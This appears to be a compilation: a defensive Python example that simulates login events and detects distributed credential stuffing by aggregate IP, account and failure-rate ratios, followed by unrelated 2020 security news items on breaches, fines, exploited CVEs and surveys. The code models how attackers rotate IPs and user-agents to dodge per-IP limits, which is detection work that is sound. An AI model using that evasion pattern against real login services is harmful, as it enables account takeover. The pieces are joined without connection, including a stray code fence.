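"""Distinguish a distributed credential-stuffing campaign from normal logins.

Added example, not Cequence's code. Assumes login events of
(timestamp, source_ip, account, user_agent, success). The traffic below is
constructed: a handful of genuine users plus a campaign that spreads attempts
across many IPs and rotates User-Agents so no single source trips a limit.
"""
from collections import Counter
from datetime import datetime, timedelta

BASE = datetime(2020, 4, 23, 12, 0, 0)  # constructed window start


def normal_traffic():
    """20 genuine users: one IP and one app build each; 1 in 10 mistypes a password."""
    return [
        (BASE + timedelta(seconds=(i * 29) % 600), f"192.0.2.{i}", f"user{i}",
         f"app/5.{i % 3} (Android)", i % 10 != 0)
        for i in range(20)
    ]


def campaign_traffic():
    """300 stuffing attempts: a new account, IP and UA every time; 1 in 50 succeeds."""
    return [
        (BASE + timedelta(seconds=(i * 37) % 600), f"203.0.{i // 250}.{i % 250}",
         f"victim{i}", f"app/5.{i % 40} (Android; build {i})", i % 50 == 0)
        for i in range(300)
    ]


def window_stats(events, start=BASE, length=timedelta(minutes=10)):
    """Population-level numbers for one time window, or None if it is empty."""
    end = start + length
    window = [e for e in events if start <= e[0] < end]
    if not window:
        return None
    return {
        "attempts": len(window),
        "distinct_ips": len({e[1] for e in window}),
        "distinct_accounts": len({e[2] for e in window}),
        "distinct_uas": len({e[3] for e in window}),
        "failure_rate": sum(1 for e in window if not e[4]) / len(window),
    }


def max_attempts_per_ip(events):
    """What a per-IP rate limiter sees; it stays at 1 for the rotating campaign."""
    return max(Counter(e[1] for e in events).values())


def looks_like_stuffing(stats, min_attempts=100, source_ratio=0.8, fail_rate=0.7):
    """Signature: many attempts, nearly every one from a fresh IP against a fresh
    account, and almost all failing. Thresholds are assumed starting points."""
    if stats is None or stats["attempts"] < min_attempts:
        return False
    return (stats["distinct_ips"] / stats["attempts"] >= source_ratio
            and stats["distinct_accounts"] / stats["attempts"] >= source_ratio
            and stats["failure_rate"] >= fail_rate)


if __name__ == "__main__":
    quiet = normal_traffic()
    noisy = quiet + campaign_traffic()
    for label, events in (("normal", quiet), ("under attack", noisy)):
        stats = window_stats(events)
        print(label, stats, "per-IP max:", max_attempts_per_ip(events),
              "stuffing:", looks_like_stuffing(stats))
```

The per-IP maximum is 1 in both cases, so an IP-based limit never fires; the window under attack shows 320 attempts from 320 addresses against 320 accounts with a 92% failure rate. Those aggregate ratios, together with the success-after-many-failures accounts that the campaign does hit, are the signals to alert on and to feed into step-up authentication for the affected login endpoint.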

AI and Machine Learning Critical to Tackling Cyber Threats Say NTT

Advanced artificial intelligence (AI) and machine learning tools are becoming increasingly critical in detecting and combatting cyber threats. This is according to Stefaan Hinderyckx, Senior Vice President, Security - Europe at NTT Ltd., speaking at the virtual NTT European Digital Press Roundtable 2020 on May 13, 2020.

According to Hinderyckx, with organizations now handling so much data, coupled with a current shortage of cybersecurity experts, identifying security threats efficiently and quickly is only possible using these technologies.

He said the global technology services company gets around 280 billion logs per month across all its clients; these can be reduced to 1000 possible threats through its automated AI and machine learning tools, which utilize complex mathematical techniques such as pattern matching and advanced correlation. NTT’s analysts can then focus on investigating these potential threats closely.

“We have this massive haystack and we put that into a manageable number of incidents that analysts can still look at,” commented Hinderyckx. “You still need humans; machine learning and AI cannot completely replace our analysts, but you can simply do it much more efficiently and the need for speed of course is there because you can’t wait for five hours from the logs coming in and flagging the alert, it has to be near real-time.”

Hinderyckx also said these technologies can pick up new threats that conventional security analysis techniques, such as security information and event management (SIEM), find difficult to identify, giving the example of the emerging threat of zero-day exploits. “By using AI we’re effectively addressing the white space,” he added.

Attacks on Banks Spike 238% During #COVID19 Crisis

Attacks on financial institutions spiked by a massive 238% from the beginning of February to the end of April, as cyber-criminals took advantage of peaks in the COVID-19 news cycle, according to VMware Carbon Black.

The company’s third annual Modern Bank Heists report revealed that over a quarter (27%) of attacks so far this year have targeted either the healthcare or financial sectors.

Interestingly, rises in attack volumes seem to have coincided with major news events during the crisis, such as the first confirmed US case, the country’s first death, and the WHO declaring a pandemic. This could be because such events provide a useful lure for phishing emails.

Ransomware attacks against the financial sector increased nine-fold from the beginning of February to the end of April 2020.

Elsewhere, Emotet and Kryptik malware variants were among the most prolific, the latter used in the notorious 2015 attack on the Ukrainian power grid. Aside from ransomware, the end goal is to transfer funds or exfiltrate sensitive data.

In fact, 82% of respondents claimed that attacks had become more sophisticated over the past year. Attackers have “dramatically increased” their understanding of internal policies and procedures and are aware of blind spots in incident response, the report claimed.

A third (33%) of respondents said they’d been hit by island hopping attacks via smaller supply chain partners, and a fifth (20%) had experienced a watering hole attack.

Of even greater concern is that a quarter (25%) said they’d been targeted by destructive attacks designed to cause maximum damage rather than to elicit a ransom payment.

“Over the years, bank heists have escalated to virtual hostage situations where cybercrime groups and nation-states have attempted to commandeer digital transformation efforts,” argued VMware’s head of security strategy, Tom Kellermann. “Now, as we address COVID-19’s impact on a global scale, it’s clear attackers are putting financial institutions directly in their crosshairs, according to our data.”

According to Accenture, the cost to address and contain cyber-attacks is higher for financial services than any other sector.

ICO’s BA and Marriott Fines Likely to Be Pushed Back Again

Legal experts have warned of more potential delays to the official GDPR fines set to be handed down to British Airways and Marriott International, potentially undermining the authority of the UK regulator.

The Information Commissioner’s Office (ICO), Europe’s largest data protection regulator by budget and employees, originally handed down a notice of intent to fine BA a massive £183.4 million fine after a Magecart-related breach on its site. A £99 million fine was slated for the hotel group soon after for its breach of 339 million customer records.

Although these were first published in July 2019, they’ve been subject to delays as the companies involved made detailed representations to the regulator.

The initial six-month period from notice of intent to fine was extended to May 2020, according to BA’s recent annual report.

However, experts at Cordery Compliance now believe the deadline will be pushed back again due to COVID-19, to around August or September.

“Our understanding is that whilst still emphasizing the seriousness of the breaches, the ICO will apply a lenient approach to the amount of the fines due to the financial impact of COVID-19,” the compliance firm added in an alert.

This is likely to raise questions about the ability and resolve of the ICO to bring large cases against well-funded corporations.

“Although the impact of COVID-19 may explain some of the current continued delay, quite why what may end up being over a year to resolve these matters since the ICO announced its intentions to fine may leave some wondering whether GDPR enforcement is going as quickly as it should,” said Cordery.

“In addition, what was also expected to be a showcase for the first significant fines under GDPR in the UK may now be a let-down.”

That said, the two companies are still facing the prospect of potentially costly litigation from disgruntled customers, it added.

A report out last month argued that Europe’s GDPR regulators are woefully under-resourced financially and lacking in the in-house technical expertise needed to take on the major technology firms.

UK Power Grid Biz Suffers Outage After Cyber-Attack

A UK power grid company has suffered a possible ransomware attack, although electricity supply to homes has not been affected.

Elexon administers a crucial part of the power supply chain, known as the Balancing and Settlement Code (BSC), with customers including the country’s suppliers, generators, distributors, traders, and energy importers and exporters.

The firm takes over one million meter readings every day to compare what generators and suppliers say they will produce or consume with actual volumes, before calculating a price for the difference and transferring funds accordingly.

At nearly midday local time yesterday the firm posted an alert claiming its internal IT systems had been impacted by a cyber-attack.

“BSC Central Systems and EMR are currently unaffected and working as normal. The attack is to our internal IT systems and ELEXON’s laptops only. We are currently working hard to resolve this. However please be aware that at the moment we are unable to send or receive any emails,” the notice read.

A further message nearly four hours later revealed that the firm had “identified the root cause and we are taking steps to restore our internal IT systems.”

The National Grid took to Twitter to reassure customers about electricity supply.

“We’re aware of a cyber-attack on Elexon’s internal IT systems,” it noted. “We’re investigating any potential impact on our own IT networks. Electricity supply is not affected. We have robust cybersecurity measures across our IT and operational infrastructure to protect against cyber-threats.”

Although yet to be confirmed, the downtime to internal systems would seem to suggest a ransomware attack, though there are other possibilities.

The power grid, like other parts of critical national infrastructure (CNI), has come under increasing scrutiny from nation-state actors in recent years, especially Kremlin-backed hackers.

Back in 2017, NCSC boss Ciaran Martin warned of Russian attacks on UK media, telecoms and energy sectors as part of its bid to “undermine the international system.”

Earlier this month Donald Trump declared a national emergency over the threat of foreign adversaries launching crippling cyber-attacks against the US power grid.

Ohio Votes to Outlaw Attempted Hacks

The Ohio House of Representatives has voted through new legislation that will criminalize all malicious hacking attempts, whether they succeed or not. 

Backers of House Bill 368 say changes are necessary as currently only malicious computer hacks that succeed are punishable under Ohio law.  

House Bill 368 was passed yesterday with a vote of 93–1, with the lone "nay" cast by state Representative Tavia Galonski. 

If approved by the Senate, the new law will prohibit a person from gaining access to, attempting to gain access to, or causing access to be gained to a computer, computer system, or computer network when certain conditions apply. 

Ethical hackers, such as those hired to test a company's cybersecurity, would not be punishable under the new law, even if they were to accidentally access data that they were not supposed to.

The legislation also proposes making penalties for offenders convicted of computer trespass harsher if they are found to have acted recklessly or if they have deliberately targeted elderly or disabled users. 

Under the new bill, victims of cybercrime would be permitted to file a civil lawsuit pursuing compensation from offenders convicted of cyber-offenses. 

Currently, Ohio only has two categories of offense covering computer crimes: criminal mischief and unauthorized use of a computer. The new legislation would update and expand these offenses with several new felony-level offenses.

Electronic data tampering and electronic data manipulation, electronic data theft, unauthorized data disclosure, electronic computer service interference, and computer trespass are among the new felony-level offenses. 

The bill was sponsored by state Representative Brian Baldridge. Speaking in support of the bill on the House floor yesterday, state Representative David Leland said: “It really corrects some glaring holes in our criminal statute related to cybersecurity."

Leland added that the newly proposed offenses would penalize crimes such as a recent attempt by an unknown malicious hacker to partially take down Ohio’s unemployment benefits website. 

The website is used by employers to report workers who have quit or refused to work during the COVID-19 pandemic, putting them at risk of losing their unemployment benefits.

Critical Flaws Found in Cyberoam Security Devices

Critical flaws have been discovered in a cybersecurity company's next-generation firewall and VPN technology.

Researchers at vpnMentor detected two vulnerabilities in cybersecurity devices developed by Cyberoam Technologies. Founded in 1999, Ahmedabad-based company Cyberoam was bought by British security software and hardware company Sophos Group plc in 2014.

Cyberoam employs 550 people globally and serves 65,000 users in over 120 countries, offering security solutions to “global corporations in the manufacturing, healthcare, finance, retail, IT sectors, and more, in addition to educational institutions, public sector and large government organizations.”

The first vulnerability was found in the FirewallOS of Cyberoam SSL VPNs in the last quarter of 2019, while the second was shared with vpnMentor by an anonymous ethical hacker at the beginning of 2020 and verified at vpnMentor's Research Lab.

"After confirming their findings, our team discovered a third flaw, which had also gone unnoticed," wrote researchers.

"These vulnerabilities, both independently and when put together, could have been potentially exploited by sending a malicious request, which would enable an unauthenticated, remote attacker to execute arbitrary commands."

Cyberoam software works by forming a gateway that blocks unauthorized access to a network. Researchers revealed that the main flaw in Cyberoam’s security involved two separate weaknesses in how an email is "released from quarantine" on a Cyberoam device.

"Both unrelated issues could have been used to give hackers access to Cyberoam’s devices, and, as an end result, make it easier to exploit any device which their firewalls were guarding," wrote researchers. 

Hotfixes have been published by Sophos to resolve the vulnerabilities, which are not the first flaws to be discovered in Cyberoam's security products. 

"For many years, people have been identifying significant weaknesses in their software products and devices," wrote researchers, before citing three specific weaknesses.

The first of these dates back to July 2012, when it was revealed that Cyberoam was using the same SSL certificate across many of its devices, making it possible for hackers to access any affected device on the company's network and intercept its data traffic.

In 2018, massive portions of Cyberoam databases were discovered for sale on the dark web after being swiped by a hacker, according to Indian media reports.

Identity Breaches at 79% of Organizations

New research published today by the Identity Defined Security Alliance (IDSA) has revealed that 79% of organizations have experienced an identity-related security breach in the last two years.

The worrisome finding emerged from a study titled “Identity Security: A Work in Progress,” which is based on an online survey of 502 IT security and identity decision makers conducted in April. The study was carried out to identify trends in identity-related security and to deduce how forward-thinking companies are trying to reduce the risk of a breach.

Researchers found that identity-related breaches are as common as mud, with 94% of organizations experiencing this particular calamity at some point and 79% saying that a breach had occurred within the past two years. 

Of those surveyed, 99% believe that the breach they experienced was preventable, but fewer than half have fully implemented key identity-related security outcomes.

Asked for their views on how identity-related breaches typically occur, 66% of respondents identified phishing as the most common cause. The results suggested that cybersecurity training could reduce the risk of a breach.

"Phishing presents a significant challenge for security leaders—of companies breached, 71% surveyed said the attack could have been prevented through better security awareness training," wrote researchers.  

The study revealed a link between an organization's attitude to cybersecurity and how recently it had experienced a breach. Only 34% of companies with a "forward-thinking" security culture have had an identity-related breach in the past year compared with 59% of companies that foster a "reactive" security culture.

Another key difference between reactive and proactive companies was the impact of a breach. Forward-thinking companies experienced similar phishing-related breaches, but fewer stolen credentials (34% vs 42%), compromised privileged credentials (27% vs 32%), inadequately managed privileges (35% vs 40%), and socially engineered passwords (32% vs 41%).

Researchers concluded that organizations could do more to prevent future breaches. They said: "There is no doubt that with explosive growth in identities in the last five years and what is still to come, organizations are shifting strategies to protect their most vulnerable attack vector with some success. But there is more work to be done."

DWF Appoints Mark Hendry as Director of Data Protection and Cybersecurity

DWF has appointed Mark Hendry as its director of data protection and cybersecurity, joining from Deloitte where he was responsible for data protection and cybersecurity risk and remediation projects for clients.

At DWF, Hendry will work alongside the global head of data protection and cybersecurity, Stewart Room, and the wider leadership team, to develop and grow the global legal business’ cybersecurity consultancy services. He will help clients from different sectors to address their cybersecurity issues and requirements, particularly in the areas of multi-disciplinary incident response services, strategic improvement and risk remediation.

Hendry’s appointment follows a lengthy career in data protection and cybersecurity. Prior to his role at Deloitte, he worked at PwC for nine years where he held a variety of positions, including group leader for the 100+ headcount London cybersecurity and business resilience business, technology audit lead for the FTSE100 practice and leadership team member of the multi-disciplinary data protection group.

Before then, he worked for Research Machines Plc and British Telecom in client facing technical project and program management roles.

Commenting on the appointment, Room stated: “We are delighted to be welcoming Mark to DWF. He is an extremely experienced data protection and cybersecurity professional who provides DWF with an added edge in the market. Mark will be critical in advising clients across a range of sectors to address their cybersecurity issues, with a focus on incident response services, strategic improvement and risk remediation."

Hendry is the latest high-profile appointment for DWF this year, following the recruitment of James Drury-Smith as its new UK national leader of privacy and cyber security last month and Room as partner and global head of data protection and cybersecurity in February.

Hendry commented: “I am delighted to have joined DWF which is a business in prime position to serve our clients and grow with them. The combination of DWF's legal expertise and associated legal and non-legal services globally provides an incredibly powerful and united platform from which to serve our clients and markets.” 

Kaspersky Report Shows Need for Improved Password Storage

More than four out of five people think up their own passwords, while 54% don’t know how to check if any of their credentials have been leaked. This is according to Kaspersky’s Defending digital privacy: taking personal protection to the next level report, which highlighted the growing need for better password storage, with people using an increasing number of online accounts.

Numerous studies have demonstrated the importance of having complex passwords that are changed regularly and differ across multiple accounts in order to prevent data breaches. Yet in this new report, 55% of users said they are able to remember all their passwords, suggesting that they do not make them sufficiently complex and unique.

The study also showed that of those who do keep a record of their passwords, many store them in places which make them vulnerable to being stolen. Of the 15,002 consumers surveyed across 23 countries, 19% stated that they store their passwords in a written file or on a computer, while 18% keep them saved in the browsers on their computers, smartphones, or tablets.

Kaspersky added that users should be made more aware of services such as ‘Have I Been Pwned?’ to enable them to check whether their passwords have been included in public leaks or data breaches without having to visit the dark web.

Marina Titova, head of consumer product marketing at Kaspersky, said: “Consumers can monitor the spread of personal data, including which passwords might have been leaked. And this is not only for the sake of ‘just being aware’; it also allows individuals to take the right action to minimize any invasion of privacy – along with any wider consequences. That’s why we at Kaspersky put a big focus on protecting consumers’ privacy.”

In order to minimize the risk of passwords being stolen, Kaspersky recommends that people never leave them in places where others may find them, whether written on paper or on a device.

Last week was World Password Day 2020, which promotes better password practice. This is an issue that takes on extra importance this year due to the unprecedented rise in people working from home as a result of COVID-19.

Remote Workers Often Not Provided Secure Tools

The number of employees working from home is increasing, but the security technology to support them is not being deployed.

According to a survey of 694 IT security administrators and practitioners, most companies fail to authenticate remote workers properly or to inspect their network traffic adequately for threats.

The research, conducted by Cato Networks, found 68% of respondents said their organizations fail to deploy enough prevention or authentication technologies for remote users. In particular, 37% do not use multi-factor authentication (MFA) for remote users, 55% fail to employ intrusion prevention software or anti-malware technology, and 11% fail to inspect traffic altogether.

“A lack of security enforcement on remote access users should be of serious concern for IT managers: enterprises cannot enable widespread remote access at the expense of security protections,” said Yishay Yovel, CMO of Cato Networks. “Enterprises should be able to provide remote access for all users anywhere, in minutes, with the security protections and network optimizations they have in the office.”

Brian Honan, CEO of BH Consulting, told Infosecurity that the numbers did not surprise him, as many companies were already struggling to roll out better authentication technologies for remote users before the global pandemic hit.

He said: “With the rush to support remote working for many more users, companies rapidly expanded their remote access solutions or migrated systems to the cloud; this rush was to ensure the business could survive and support staff to continue working.

“However, now that those immediate goals have been met and our response to the pandemic may be more long term than initially planned, companies need to review the security and resilience of their remote access solutions.”

The news follows research from earlier this week, when a Tripwire survey found 94% of cybersecurity professionals were more concerned about security in the wake of COVID-19. Its survey of 345 IT security professionals found that 89% said remote working had made the job more difficult. Additional findings included: 

  • 49% said they cannot effectively secure employees’ home office environments
  • 41% said it is more challenging to manage what devices are connecting to their corporate networks
  • 38% said it is hard to gain visibility into remote assets and systems

The survey also found that 53% of respondents were increasing security investment with 28% investing in new tools. 

“The massive shift to working remotely represents a huge change for organizations’ attack surfaces,” said Tim Erlin, vice-president of product management and strategy at Tripwire. “It’s no surprise that security professionals are finding it challenging to monitor and minimize the new attack surfaces.”

Microsoft OLE Bugs Most Frequently Exploited Since 2016

The US government has released new technical guidance highlighting the 10 most commonly exploited vulnerabilities of recent years, in a bid to improve awareness and patching among organizations.

It warned that “foreign cyber-actors” often choose to focus on known and often dated vulnerabilities as they require fewer resources to exploit than researching zero-days. Although the top 10 list is for flaws exploited in 2016-19, two of the featured CVEs date back even before this period, to 2012 and 2015.

“The public and private sectors could degrade some foreign cyber threats to US interests through an increased effort to patch their systems and implement programs to keep system patching up to date,” the notice urged.

“A concerted campaign to patch these vulnerabilities would introduce friction into foreign adversaries’ operational tradecraft and force them to develop or acquire exploits that are more costly and less widely effective. A concerted patching campaign would also bolster network security by focusing scarce defensive resources on the observed activities of foreign adversaries.”

Microsoft’s Object Linking and Embedding (OLE) technology was most commonly targeted between 2016 and 2019, featured in the top two most exploited CVEs: CVE-2017-11882 and CVE-2017-0199. Along with OLE-related CVE-2012-0158 they comprise the three bugs most frequently used by state-sponsored attackers from China, Iran, North Korea and Russia.

Chinese attackers were also still using CVE-2012-0158 in December 2019, highlighting that organizations have yet to patch, despite the vulnerability being flagged in 2015 as a common target for Beijing-backed hackers.

As for vulnerabilities exploited so far in 2020, the report warned of attacks targeting VPN systems made by Citrix and Pulse Secure, particularly in light of the rapid shift to home working due to COVID-19.

The same vulnerabilities are also thought to have been exploited by cyber-criminals in sophisticated APT-style ransomware attacks, according to Microsoft.

“The DHS report appears to align with what we are seeing in the wild,” said Edgescan CEO, Eoin Keary. “Ultimately, attackers don’t care where the vulnerability is, which is why a full-stack vulnerability management approach is advised in such a fast-changing threat landscape.”